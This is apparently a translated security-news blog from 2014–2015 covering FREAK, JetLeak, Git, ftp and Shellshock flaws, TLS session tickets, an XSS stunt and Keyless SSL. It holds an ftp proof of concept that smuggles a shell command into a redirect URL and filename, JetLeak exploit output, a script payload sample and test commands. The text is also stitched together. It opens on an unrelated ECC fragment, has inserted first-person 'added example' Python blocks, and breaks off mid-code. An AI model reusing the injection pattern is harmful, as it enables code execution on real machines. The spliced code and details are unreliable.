    - Increased Patrol Scrub timers – systems that are equipped with ECC memory will often have a BIOS option that allows the administrator to set an interval at which the CPU will utilize the checksum data stored on each ECC DIMM module to ensure that the contents of memory are valid, and correcting any bit errors that may have been introduced. The number of correctable errors will vary based on architecture and ECC variant. Administrators may consider reducing the patrol scrub timers from the standard 20 minute interval to a lower value.

    Server-based chipsets starting with the Intel Ivy Bridge (IVB) chipset provide support for pTRR.





protect from ElasticSearch RCE (CVE-2015-1427) / JetLeak with Naxsi

2015.03.10

on our own behalf




OpenSSL Cookbook 2nd Edition now available

2015.03.04


FeistyDuck has published the 2nd edition of Ivan Ristic's OpenSSL Cookbook. In just under 100 pages it explains the most commonly used OpenSSL features and commands; the OpenSSL Cookbook is an excerpt from the book Bulletproof SSL and TLS by the same author and is available as a free download as PDF, EPUB or Mobi, or as an HTML version for reading online.

From the changelog:

  • new chapter "Testing with OpenSSL", focused on server tests and the evaluation of their results
  • new chapter "Recommended Configuration" with a list of recommended cipher suites
  • new chapter "Creating a Private Certification Authority" with detailed instructions for setting up CAs
  • updates to the chapter "SSL/TLS Deployment Best Practices"

Table of contents:

  1. OpenSSL
    • Getting Started
    • Key and Certificate Management
    • Configuration
    • Creating a Private Certification Authority
  2. Testing with OpenSSL
  3. SSL/TLS Deployment Best Practices
    • Private Key and Certificate
    • Configuration
    • Performance
    • Application Design
    • Validation
    • Advanced Topics





FREAKShow - TLS flaw enables MITM through cipher downgrades

2015.03.03

A group of crypto researchers from INRIA, Microsoft Research and IMDEA has found a flaw in several TLS implementations (among them the Android browser and Apple's Safari) that weakens the encryption through a cipher downgrade to export-grade ciphers and can thereby enable a MITM attack. In the OpenSSL server implementation support for export-grade cipher suites is disabled by default; nevertheless, an analysis found 12% of the Alexa Top 1 Million websites on which this flaw can be exploited.

Support for these weak algorithms has remained in many implementations such as OpenSSL, even though they are typically disabled by default; however, we discovered that several implementations incorrectly allow the message sequence of export ciphersuites to be used even if a non-export ciphersuite was negotiated.

Ironically, many US government agencies (including the NSA and FBI), as well as a number of popular websites (such as the OAuth SDK server of Facebook, IBM, or Symantec) enable export ciphersuites on their server - by factoring their 512-bit RSA modulus, we can impersonate them to vulnerable clients. (src: smacktls.com)

Matthew Green explains the background and facts of the flaw in an excellent blog post, including why such a large share of SSL/TLS sites are vulnerable: Akamai, one of the largest CDNs, was affected by the flaw but has since fixed the problem.

Based on some recent scans by Alex Haldeman and Zakir Durumeric at University of Michigan, it seems that export-RSA is supported by as many as 5.2% 36.7% (!!!!) of the 14 million sites serving browser-trusted certs. The vast majority of these sites appear to be content distribution networks (CDN) like Akamai. Those CDNs are now in the process of removing export grade suites.

While the numbers are impressive, the identity of those sites is a bit more worrying. They include U.S. government sites like www.nsa.gov (Oy vey), www.whitehouse.gov and www.irs.gov. It turns out that the FBI tip reporting site (tips.fbi.gov) was also vulnerable.

Vulnerable sites also included connect.facebook.net, which is the source of the famous Facebook 'Like' button which shows up on secure web pages all over the Internet. Attacks on these connections could lead to content injection on a huge number of web pages.

(Facebook have updated their configuration as a result of this work.) (src: Matthew Green)

Analysis of the worldwide TLS infrastructure via freakattack.com

Affected software

Server:

  • OpenSSL in unusual configurations (export-grade ciphers are disabled by default)
  • Windows Server 2003-2012R2

Clients

  • Android browser
  • Safari (OSX, Linux, Windows)
  • Internet Explorer
  • Chrome on Android
  • Blackberry Browser
  • Opera

Not affected:

  • OpenSSL in the default configuration
  • LibreSSL
  • Chrome on Windows, OSX, Linux
  • Firefox

Tests

local quick test:

$ nmap --script ssl-enum-ciphers -p 443 sohu.com | grep -c EXPORT   # number of export-grade suites offered; 0 means none

# requires EXPORT cipher support in the local openssl client
$ openssl s_client -connect example.com:443 -cipher EXPORT 2>&1 > /dev/null | grep "handshake failure" > /dev/null && echo "OK" || echo "VULNERABLE"





JetLeak - Jetty Webserver leaked shared buffers (CVE-2015-2080)

2015.02.28

tl; dr: if you run jetty behind nginx you're probably safe, else upgrade


Gotham Digital Science discovered a nice vuln in the Java-based Jetty web server that allows a remote attacker to read shared memory from the process. A test script is available, and it is possible to build a working PoC from the information that is public; the Jetty team has released an advisory too, which contains a nice PoC as well:

[ door@vakt :~/exploits/remote] > ./jetleak.sh 8181

-- Normal Request --
HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 292
Connection: close
Server: Jetty(9.2.8.v20150217)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/>
<title>Error 404 </title>
</head>
<body>
<h2>HTTP ERROR: 404</h2>
<p>Problem accessing /test/dump/info. Reason:
<pre>    Not Found</pre></p>
<hr /><i><small>Powered by Jetty://</small></i>
</body>
</html>


-- Bad Cookie --
HTTP/1.1 400 Illegal character 0x7 in state=HEADER_IN_NAME in 'GET /test/dump/in... localhost\nCoo\x07<<<kie: \x07\n\n>>>e: application/x-...\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Content-Length: 0
Connection: close
Server: Jetty(9.2.8.v20150217)

affected Versions:

  • 9.2.3 to 9.2.8

mitigations

  • if you run your jetty behind a reverse proxy like nginx you are probably safe; we found nginx blocking the request, but apache happily forwarding everything to jetty
  • updates for v9.2.9 are available





Nginx goes HTTP/2

2015.02.26

The Nginx team has announced in a blog post that it will implement HTTP/2 by the end of the year.

Since the IETF announced last week that the HTTP/2 specification has been finalized and will be published as an RFC, many customers have asked about our plans to support the new protocol in our open source nginx and commercial NGINX Plus products. We’re pleased to announce that we plan to release versions of nginx and NGINX Plus by the end of 2015 that will include support for HTTP/2.

Until then SPDY/3.1 can still be used, which is supported by all major desktop and mobile browsers (Chrome, Firefox, IE from v11, Safari from v8).




HTTP/2 is Done

2015.02.18

The IESG has formally approved the HTTP/2 and HPACK specifications, and they’re on their way to the RFC Editor, where they’ll soon be assigned RFC numbers, go through some editorial processes, and be published. src: Mark Nottingham

The corresponding RFC is expected in the coming days; as soon as server-side implementations are available we will report on them. A wiki entry of the HTTP/2 working group lists more than 30 current client/server implementations; HTTP/2 is already supported by Chrome, Firefox, Twitter (client/server), Go and Jetty in their final or one of their latest versions.

Fitting in with this is Google's announcement (Hello HTTP/2, Goodbye SPDY) to support only HTTP/2 in future Chrome versions.




Hacking as a Service - Case Study

2015.02.17


tl;dr: DROP 64.39.96.0/20

Andy Cuff of Computer Network Defence, prompted by a massive and aggressive scan from Qualys' cloud scanners, analysed this service and its scans more closely and concludes that the scans, among other things, try user/password combinations (brute force) and can thus potentially break into services, and that unauthorised third parties can commission the scans. Combined, these two points make the Qualys offering suitable for attackers who want to scan websites and networks unnoticed and find simple vulnerabilities.

As with most public facing networks, we are frequently targeted and scanned, though the Qualys scan violated us more than most. We do rely heavily on instinct and this one put the analysts spider senses on alert.
...
The Security as a Service (SAAS) vendors must take responsibility for their actions and be more effective in vetting their supposed clients prior to scanning hosts. It's not exactly rocket science to verify domains and IP addresses. With Qualys, I subscribed and was offered 10 free scans and all I had to do was state my name, my company name and verify my email address. Qualys state "Your information will be kept private!" They didn't even require credit card details. I'd be interested to know if they disabled his account.





End of the m0n0wall project

2015.02.16

Src: m0n0.ch/wall/end_announcement.php

Dear m0n0wall enthusiasts,

on this day 12 years ago, I have released the first version of m0n0wall to the
public. In theory, one could still run that version - pb1 it was called - on a
suitably old PC and use it to control the Internet access of a small LAN (not
that it would be recommended security-wise). However, the world keeps turning,
and while m0n0wall has made an effort to keep up, there are now better solutions
available and under active development.

Therefore, today I announce that the m0n0wall project has officially ended. No
development will be done anymore, and there will be no further releases.

The forums and the mailing list will be frozen at the end of this month. All the
contents of the website, repository, downloads, mailing list and forum will be
archived in a permanent location on the web so that they remain accessible
indefinitely to anyone who might be interested in them.

m0n0wall has served as the seed for several other well known open source
projects, like pfSense, FreeNAS and AskoziaPBX. The newest offspring, OPNsense
(https://opnsense.org), aims to continue the open source spirit of m0n0wall
while updating the technology to be ready for the future. In my view, it is the
perfect way to bring the m0n0wall idea into 2015, and I encourage all current
m0n0wall users to check out OPNsense and contribute if they can.

Finally, I would like to take this opportunity to thank everyone who has been
involved in the m0n0wall project and helped in some way or another - by
contributing code, documentation, answering questions on the mailing list or the
forum, donating or just spreading the word. It has been a great journey for me,
and I'm convinced that even now that it has come to an end, the m0n0wall spirit
will live on in the various projects it has spawned.

Manuel Kasper
15 February 2015



Today I Am Releasing Ten Million Passwords

2015.02.11

Mark Burnett has released 10 million passwords, primarily to serve as a source for further research:

Although researchers typically only release passwords, I am releasing usernames with the passwords. Analysis of usernames with passwords is an area that has been greatly neglected and can provide as much insight as studying passwords alone. ...

Furthermore, I believe these are primarily dead passwords, which cannot be defined as authentication features because dead passwords will not allow you to authenticate. The likelihood of any authentication information included still being valid is low and therefore this data is largely useless for illegal purposes.

The data is old and partly obfuscated; for e-mail addresses the domain part was removed to protect logins that may still be active. In an FAQ Mark Burnett explains more about the origin of the data and how it was collected and analysed.

Shortly after publication the first analyses of the data set appeared on HN:

# list of the most frequently used passwords
$ export LC_ALL='C'
$ awk '{ print $2 }' 10-million-combos.txt | tr 'A-Z' 'a-z' | sort | uniq -c | sort -nr | head -n 20
    55893 123456
    20785 password
    13582 12345678
    13230 qwerty
    11696 123456789
    10938 12345
    6432 1234
    5682 111111
    4796 1234567
    4191 dragon
    3845 123123
    3734 baseball
    3664 abc123
    3655 football
    3330 monkey
    3206 letmein
    3136 shadow
    3126 master
    3050 696969
    3002 michael

# list of the most frequently used logins
# (command reconstructed from the password pipeline above; column 1 holds the username)

$ export LC_ALL='C'
$ awk '{ print $1 }' 10-million-combos.txt | tr 'A-Z' 'a-z' | sort | uniq -c | sort -nr | head -n 20
  3044 info
  2119 admin
  1323 michael
  1113 robert
  1095 2000
  1049 john
  1041 david
  967 null
  940 richard
  922 thomas
  901 chris
  866 mike
  843 steve
  832 dave
  816 daniel
  812 andrew
  797 george
  765 james
  735 mark
  730 dragon





OpenSSL 1.0.2 is on the horizon

2015.01.14

In a mail to [openssl-dev] the OpenSSL team has announced the release of OpenSSL 1.0.2 for the end of January:

  • OpenSSL 1.0.2 will be released on Thursday 22nd January.

Further changes concern bug fixes and a reformatting of the code:

  • There will be new releases made available on Thursday 15th January for versions 1.0.1, 1.0.0 and 0.9.8. These will be bug fix only releases to address build problems with the current releases on the Windows and OpenVMS platforms. No new security issues will be included in these releases.

  • The whole OpenSSL codebase will be reformatted according to the newly published OpenSSL coding style (https://www.openssl.org/about/codingstyle.txt) on Wednesday 21st January. This will include the master, 1.0.2, 1.0.1, 1.0.0 and 0.9.8 branches. See [1] for further background information.

  • Between the releases being made available on 15th January and the code reformat on 21st January the 1.0.1, 1.0.0 and 0.9.8 branches in the public repository will be frozen and no changes will be made (except in the case of very high priority fixes).




The 90s called: flaw in the Windows Telnet service allows remote code execution

2015.01.14

In an advisory Microsoft warns of a flaw in the Telnet service that can potentially lead to remote code execution.

By default this service is installed only on Windows Server 2003, and there it is not enabled. Microsoft recommends that affected admins patch their systems promptly.

A quick search revealed almost 200,000 potentially attackable Microsoft Telnet servers, mainly in Korea, China, the USA and Russia.

Mitigating Factors

The following mitigating factors may be helpful in your situation:

  • By default, Telnet is installed but not enabled on Windows Server 2003. Only customers who enable this service are vulnerable.
  • By default, Telnet is not installed on Windows Vista and later operating systems. Only customers who manually install and enable this service are vulnerable.

Workarounds

Microsoft has not identified any workarounds for this vulnerability.





Hacking a Bitcoin Exchange

2015.01.13

In a pentest Egor Homakov shows how he takes over a Bitcoin exchange in a multi-stage attack and is able to steal bitcoins.

Egor Homakov at his best!




Flaw in Git and Mercurial affects OS X and Windows

2014.12.19

GitHub reports a critical flaw in the Git client that mainly affects OS X and Windows users, since the flaw is exploitable when case-insensitive file systems are used.

HN has a good short summary:

"Short panic summary: your git/hg remotes can get code execution on your machine when you clone/pull if you are on OSX or Windows.

Summary: on case-insensitive/normalizing filesystems (default on OSX and Windows) it's possible for .git/config to be overwritten by the tree, probably due to a case-sensitive sanity check when the actual file is insensitive. .git/config can contain arbitrary commands to be run on certain events/as aliases, so it leads to code execution. This is a risk when you get a tree from a third party, so on pull/fetch+checkout/clone...

There's an analogous vulnerability in Mercurial.

Update, then run git --version and make sure it's one of v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, or v2.2.1. And be careful when pulling/cloning from third-parties."


Atlassian, developer of the popular SourceTree Git tool, has already sent out an advisory and offers update information for Windows and Mac/OS X.

Affected Git versions:

  • v1.8.5.5 or lower
  • v1.9.4
  • v2.0.4
  • v2.1.4
  • v2.2.0

Affected Mercurial versions (see):

  • 3.2.2





reCAPTCHA, NoCAPTCH, BreakCAPTCHA

2014.12.05

Google presented a new captcha system a few days ago.




HTTP vs HTTPS - Speedtest

2014.12.04

The website httpvshttps.com measures the page-load speed of HTTP vs HTTPS; the result is astonishing: with SPDY enabled, loading the page via HTTPS is 2-8 times faster than via HTTP (YMMV).




The sad state of server-side TLS Session Resumption implementations

2014.11.18

Tim Taubert of the Mozilla team has analysed the SSL session ticket implementations of popular web servers and reverse proxies (Apache, Nginx, HAProxy) and found that the common practice of using a session cache / session tickets can cause problems with PFS cipher suites, because none of the implementations remove expired session tickets from the session store:

"One of the most important features to improve user experience for visitors accessing your site via TLS is session resumption. Session resumption is the general idea of avoiding a full TLS handshake by storing the secret information of previous sessions and reusing those when connecting to a host the next time. This drastically reduces latency and CPU usage.

Enabling session resumption in web servers and proxies can however easily compromise forward secrecy. "

Ivan Ristic explains in a Reddit comment that the problem stems from the use of OpenSSL:

"To add to the post, the reason neither Apache nor Nginx implement session tickets properly is because both off-load the functionality to OpenSSL. OpenSSL generates a random ticket key on startup, while there is only one process. Apache and Nginx are multi-process servers, where children fork from the initial master process. That's the reason why the ticket keys are not rotated -- OpenSSL doesn't know anything about the actual architecture (of Apache and Nginx). Both web servers really need to implement session ticket handling directly and incorporate rotation into it."

As a reference, a blog post by Twitter is cited; they have implemented their own system of rotating session ticket keys:

  • To do so, we have a set of key generator machines, of which one is the leader. The leader generates a fresh session ticket key every twelve hours and zeroes old keys after thirty-six hours.
  • Every five minutes, our frontends fetch the latest ticket keys from a key generator machine via SSH.
  • When a new ticket key K is available, we don’t want to start encrypting new tickets with it until we expect that each frontend has a copy of K and can decrypt those tickets.
  • In general, frontends will have three ticket keys available: the current key, and the two previous keys. They can decrypt session tickets using any of those three. When a client resumes a session using one of the previous keys, a frontend will finish the abbreviated handshake and assign a new session ticket using the current key."
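The rotation scheme quoted above, as an added example in Python that is not Twitter's code (nor anything from Apache, Nginx or OpenSSL): the twelve-hour rotation, the zeroing after thirty-six hours, the five-minute fetch and the three-key window come from the quoted post, while the ticket format, the HMAC-SHA256 toy keystream standing in for real ticket encryption and the two-fetch-interval delay before a new key is used for issuing are my own assumptions so that it runs with the standard library alone.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass

HOUR = 3600
ROTATE_EVERY = 12 * HOUR   # the leader mints a fresh ticket key every twelve hours
ZERO_AFTER = 36 * HOUR     # ... and zeroes keys older than thirty-six hours
FETCH_INTERVAL = 5 * 60    # frontends pull the key list every five minutes
# Assumption (not from the post): a frontend issues tickets under a new key only
# after two fetch intervals, when every peer is expected to hold a copy of it.
ISSUE_DELAY = 2 * FETCH_INTERVAL
KEY_ID_LEN, NONCE_LEN, TAG_LEN = 8, 16, 32


@dataclass
class TicketKey:
    key_id: bytes   # public identifier prefixed to every ticket
    secret: bytes   # 32-byte secret, overwritten with zeros when retired
    created: int    # unix time the leader generated it


class KeyGenerator:
    """The leader key-generator machine: owns the key schedule, newest key first."""
    def __init__(self, now: int):
        self.keys = []
        self.rotate(now)

    def rotate(self, now: int) -> None:
        self.keys.insert(0, TicketKey(os.urandom(KEY_ID_LEN), os.urandom(32), now))
        keep = [k for k in self.keys if now - k.created < ZERO_AFTER]
        for old in self.keys[len(keep):]:   # 36h old: zero it, tickets under it die
            old.secret = bytes(32)
        self.keys = keep                    # leaves the current key plus two previous


class Frontend:
    def __init__(self):
        self.keys = []

    def fetch(self, gen: KeyGenerator) -> None:   # the post does this over SSH
        self.keys = [TicketKey(k.key_id, k.secret, k.created) for k in gen.keys]

    def issuing_key(self, now: int) -> TicketKey:
        """Newest key that every peer should already hold; never a key just fetched."""
        usable = [k for k in self.keys if now - k.created >= ISSUE_DELAY]
        return usable[0] if usable else self.keys[-1]


def _keystream(secret: bytes, nonce: bytes, length: int) -> bytes:
    # Toy CTR-style keystream from HMAC-SHA256; stands in for a real AEAD (assumption).
    blocks = (hmac.new(secret, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
              for i in range((length + 31) // 32))
    return b"".join(blocks)[:length]


def seal(key: TicketKey, state: bytes) -> bytes:
    """Ticket = key_id || nonce || (state XOR keystream) || HMAC-SHA256 tag."""
    nonce = os.urandom(NONCE_LEN)
    ct = bytes(a ^ b for a, b in zip(state, _keystream(key.secret, nonce, len(state))))
    body = key.key_id + nonce + ct
    return body + hmac.new(key.secret, b"mac" + body, hashlib.sha256).digest()


def open_ticket(keys, ticket: bytes):
    """Session state, or None (=> full handshake) when the key is gone or the tag fails."""
    body, tag = ticket[:-TAG_LEN], ticket[-TAG_LEN:]
    for k in keys:
        if k.key_id != body[:KEY_ID_LEN]:
            continue
        if not hmac.compare_digest(hmac.new(k.secret, b"mac" + body, hashlib.sha256).digest(), tag):
            return None
        nonce, ct = body[KEY_ID_LEN:KEY_ID_LEN + NONCE_LEN], body[KEY_ID_LEN + NONCE_LEN:]
        return bytes(a ^ b for a, b in zip(ct, _keystream(k.secret, nonce, len(ct))))
    return None


def simulate() -> dict:
    """Walk one frontend through 36 hours and record which tickets still resume."""
    t0 = 1_700_000_000
    gen, fe = KeyGenerator(t0), Frontend()
    fe.fetch(gen)
    state = b"resumption-master-secret+suite"   # constructed session state
    ticket = seal(fe.issuing_key(t0), state)    # issued under the very first key K0
    out = {}
    for step in (1, 2, 3):                      # 12h, 24h, 36h after K0
        now = t0 + step * ROTATE_EVERY + 60     # one minute after the rotation
        gen.rotate(now)
        fe.fetch(gen)
        out[f"keys_held_{12 * step}h"] = len(fe.keys)
        out[f"ticket0_resumes_{12 * step}h"] = open_ticket(fe.keys, ticket) == state
        out[f"issues_with_new_key_{12 * step}h"] = fe.issuing_key(now) is fe.keys[0]
        out[f"issues_with_new_key_after_delay_{12 * step}h"] = fe.issuing_key(now + ISSUE_DELAY) is fe.keys[0]
    # a client that resumed under a previous key gets a fresh ticket under the current key
    reissued = seal(fe.issuing_key(now + ISSUE_DELAY), state)
    out["reissued_resumes"] = open_ticket(fe.keys, reissued) == state
    tampered = bytearray(reissued)
    tampered[30] ^= 1                           # flip one ciphertext bit
    out["tampered_rejected"] = open_ticket(fe.keys, bytes(tampered)) is None
    return out
```

simulate() shows the window in action: a ticket issued under K0 still resumes at 24h (K0 is two keys back) but not at 36h, when K0 has been zeroed and the client silently falls back to a full handshake.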





CREAM: the scary SSL attack you’ve probably never heard of

2014.11.13

Tony Arcieri explains in detail in this article a timing/side-channel attack from 2005 on OpenSSL's AES implementation.

"CREAM is a cache timing attack that was used against OpenSSL’s implementation of AES. It allows an attacker on one computer to extract AES keys from another computer over a network. The attack works by measuring round trip timings of known plaintexts encrypted under AES by OpenSSL running on the victim’s computer.

That’s right: simply by measuring minute timing discrepancies over a network, an attacker could extract AES keys from another computer, making it almost as severe as Heartbleed. These timing discrepancies occurred because AES uses a design element known as an S-box, which is effectively a table whose elements we look up based on the AES key. Unfortunately, CPUs are extremely eager to optimize these sorts of lookups with caches, and because the lookups are ultimately based on the key, they introduce what’s known as a side-channel."





Remote code execution via ftp on Mac OS 10.10 (Yosemite), NetBSD, FreeBSD

2014.10.28

A flaw in the FreeBSD ftp client can be abused to execute code on the victim's machine. The flaw can be exploited when the FTP client is asked to download a file from an http URL; example code has been published on the openwall mailing list:

$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a

$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
$ ftp http://localhost/cgi-bin/redirect

   Trying ::1:80 ...
   ftp: Can't connect to `::1:80': Connection refused
   Trying 127.0.0.1:80 ...
   Requesting http://localhost/cgi-bin/redirect
   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
   Requesting http://192.168.2.19/cgi-bin/|uname%20-a
       32      101.46 KiB/s
   32 bytes retrieved in 00:00 (78.51 KiB/s)
   NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
   ADT 2014

$

Affected are NetBSD, FreeBSD and OS X 10.10; Linux systems are affected if the FTP client "tnftp" is used, which is not installed by default.

A PoC for testing is available.




All Your Data Are Belong To US: iCloud stores local data without asking

2014.10.27

Jeffrey Paul has found that, from OS X 10.10 Yosemite on, all opened/auto-saved documents are stored in iCloud without asking, even if the file was explicitly not saved on the iDrive; this affects all Apple programs (TextEdit, Keynote, Pages etc.) but also third-party programs that auto-save files:

"This happens for all applications (think iA Writer, Pixelmator, et c) that had saved application state. Any open and yet-unsaved document within an app is now silently and automatically uploaded to iCloud Drive, and, by extension, the government.

This is unacceptable.

Apple has taken local files on my computer not stored in iCloud and silently and without my permission uploaded them to their servers - across all applications, Apple and otherwise."

According to an Apple knowledge-base article this is documented behaviour.

Besides the data from open documents, e-mail addresses are also sent to Apple:

"It would appear that iCloud is synchronizing all of the email addresses of people you correspond with, even for non-iCloud accounts, to their recent addresses service. This means that names and email addresses that are not in iCloud contacts, not synchronized to your device, and only available in an IMAP-accessed inbox are now being sent to Apple, silently."




don't run 'strings' on untrusted files (lcamtuf)

2014.10.26

Michał Zalewski, aka "lcamtuf", has discovered a vulnerability in libbfd of the GNU binutils, which is used among others by the programs "strings" and "objdump"; through this vulnerability it is potentially possible to hide code in binaries that gets executed when they are analysed with "strings":

"The 0x41414141 pointer being read and written by the code comes directly from that proof-of-concept file and can be freely modified by the attacker to try overwriting program control structures. Many Linux distributions ship strings without ASLR, making potential attacks easier and more reliable. " - (lcamtuf)

Workaround

  • strings -a FILE : the "-a" option runs "strings" bypassing libbfd




SSL Config Generator from Mozilla

2014.10.23

The Mozilla team has published an SSL Config Generator that produces SSL setups and cipher suites for Apache, Nginx and HAProxy.

Besides the different servers, different profiles can be selected (Modern, Intermediate, Old), which are explained in more detail in Mozilla's guide Security/Server Side TLS.




LibreSSL 2.1.1 released

2014.10.16

The OpenBSD team has released the next version, LibreSSL 2.1.1, only a few days after LibreSSL 2.1.0, in reaction to the POODLE bug.

Most important change: support for SSLv3 has been removed entirely; the associated commit message is interesting:

Fuck it. No SSLv3; not now, not ever. The API of the future will only support the protocols of the future. (Perhaps a bit late in burning this bridge entirely, but there's no time like the present, esp. with other players now leaning against back compat.)





LibreSSL 2.1.0 released

2014.10.13

LibreSSL 2.1.0 was released on 12 October; downloads are available on the mirrors.

An interesting change concerns the Linux kernel: from kernel version 3.17 on, LibreSSL 2.1.0 uses the new getrandom() syscall, which was introduced in the course of the discussions between the OpenBSD developers and the kernel developers to give Linux a more robust basis for random numbers. [link]

Release notes / changelogs are not available, but the git log of the LibreSSL repo gives some insight into the changes; a comment on Reddit gives a short overview:

2.1.0 represents the first portable snapshot for what will eventually become the version included with OpenBSD 5.7.

- support for automatic ephemeral EC keys
- lots of memory leaks / overflow checks in error cases are fixed
- The TLS padding extension (that works around bugs in F5 terminators) is off by default
- support for getrandom(2) on Linux 3.17
- the NO_ASM macro is no longer being set, providing the first bits toward enabling other asm.



SPHINCS: practical stateless hash-based signatures

2014.10.09


From the popular series "post-quantum-computer cryptography (fefe)":

"SPHINCS-256 is a high-security post-quantum stateless hash-based signature scheme that signs hundreds of messages per second on a modern 4-core 3.5GHz Intel CPU. Signatures are 41 KB, public keys are 1 KB, and private keys are 1 KB. SPHINCS-256 is designed to provide long-term 2^128 security even against attackers equipped with quantum computers. Unlike most hash-based signature schemes, SPHINCS-256 is stateless, allowing it to be a drop-in replacement for current signature schemes."

SRC: http://sphincs.cr.yp.to/




Ghost in the ShellShock: Yahoo hacked

2014.10.06

tl;dr: a whitehat watched blackhats taking over servers in the Yahoo network.

Yahoo's response

"Howdy, Hacker News. I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock.

Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.

Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.

As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!"

Links:




Who.is the Harlem Shake

2014.09.24

who.is, MToolbox.org and possibly other popular DNS query websites have fallen victim to an amusing XSS attack: the websites danced the Harlem Shake after Jamie Hankins used DNS TXT records to plant a persistent XSS payload; this is not a flaw in the DNS protocol but in the vulnerable websites, which do not properly sanitize user input.

Never trust user input

nuff said

Warning: loud audio, may cause a feeling of atmospheric disturbance in those over 40
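The input-handling flaw behind the stunt, as an added example that is not code from who.is or MToolbox.org: TXT RDATA is parsed from its DNS wire format and rendered into an HTML table once unescaped and once escaped. The record bytes and the hostname are constructed here.

```python
"""Render DNS TXT records the way a lookup page does: unsafely and safely.

Added example, not code from any of the affected sites. The TXT record
bytes below are constructed for the demonstration.
"""
import html


def parse_txt_rdata(rdata: bytes) -> list:
    """RFC 1035 TXT RDATA: a sequence of <length octet><up to 255 octets>."""
    strings, pos = [], 0
    while pos < len(rdata):
        n = rdata[pos]
        chunk = rdata[pos + 1:pos + 1 + n]
        if len(chunk) != n:
            raise ValueError("truncated character-string in TXT RDATA")
        # Record contents are attacker-controlled bytes, not guaranteed UTF-8.
        strings.append(chunk.decode("utf-8", errors="replace"))
        pos += 1 + n
    return strings


def txt_is_well_formed(rdata: bytes) -> bool:
    try:
        parse_txt_rdata(rdata)
        return True
    except ValueError:
        return False


def render_unsafe(name: str, strings: list) -> str:
    """The flaw on the affected sites: record contents pasted straight into markup."""
    rows = "".join("<tr><td>%s</td><td>%s</td></tr>" % (name, s) for s in strings)
    return "<table>%s</table>" % rows


def render_safe(name: str, strings: list) -> str:
    """Same output, but every DNS-sourced string is HTML-escaped first."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td></tr>"
        % (html.escape(name, quote=True), html.escape(s, quote=True))
        for s in strings
    )
    return "<table>%s</table>" % rows


def build_txt_rdata(*strings: bytes) -> bytes:
    """Encode character-strings into TXT RDATA (used to construct the sample)."""
    return b"".join(bytes([len(s)]) + s for s in strings)


# Constructed sample: a benign SPF-style string and a string carrying markup.
SAMPLE_RDATA = build_txt_rdata(b"v=spf1 -all", b"<script>alert(1)</script>")

if __name__ == "__main__":
    strings = parse_txt_rdata(SAMPLE_RDATA)
    print(render_unsafe("example.com", strings))  # markup survives: XSS
    print(render_safe("example.com", strings))    # markup neutralised
```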

References




Keyless SSL from CloudFlare: private private keys

2014.09.23


CloudFlare has announced Keyless SSL, a technique/feature with which customers no longer have to hand their SSL private keys to CloudFlare but can instead run a key server in their own infrastructure. Keyless SSL works with both RSA and DH cipher suites (DHE/ECDHE), i.e. PFS can still be offered for older and modern browsers. A detailed blog post (Keyless SSL: The Nitty Gritty Technical Details) explains the technical details.

A post on HN sums up the pros and cons of the new solution:

Let's first see what the problem is with the old method, storing the private key on the Cloudflare server:

  1. Cloudflare can read all traffic.
  2. Cloudflare can read traffic they can intercept
  3. Anyone able to break into Cloudflare, physically or technically (or legally, hello NSA!), has the same capabilities.

Now we implement this new system:

  1. Cloudflare can still read all traffic.
  2. They can no longer passively read any traffic
  3. Anyone hacking Cloudflare is now limited in the same way Cloudflare is (so the same as point number two).

So far the security concerns. Now as for speed and DDoS mitigation

  • Cloudflare now needs to query an external server for every https connection... it all adds up and in the end you notice that pages need to load, even if only for a sec.
  • The SSL termination point is now nearer to the client, as Cloudflare has datacenters all around the world.
  • Cloudflare is still useful for mitigating attacks, just like with normal http traffic.
  • Session reuse makes this somewhat less of a pain, as the keyserver need not be queried for repeated https connections. We'd need to see numbers to know how much of a win this is, though. In any case, it's never faster than not having the keyserver.

In conclusion, you have three options:

  • Don't use Cloudflare. Fastest website, but risk of DDoS.
  • Old-style Cloudflare https setup: handing over your keys. DDoS risk mitigated.
  • New technique: providing keyservers. Slightly slower than the old style, but with a tiny security advantage that might help with either management or rare kinds of high-profile attacks.

The following images illustrate the handshake for RSA and DH cipher suites:

[images: keyless-ssl handshake diagrams, RSA and DH]

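The RSA-versus-DHE difference the two handshake diagrams illustrate, as an added example that is not CloudFlare's code: a simulated edge derives the session key itself but sends every private-key operation to a key server. The toy RSA primes, the small DH group and the hash-based key derivation are constructed stand-ins; the point is what each party gets to see.

```python
"""Simulated Keyless SSL handshake: edge, client and key server.

Added example, not CloudFlare's code. Toy parameters (tiny RSA primes,
a small DH group, no padding) are constructed for illustration only.
"""
import hashlib
import secrets

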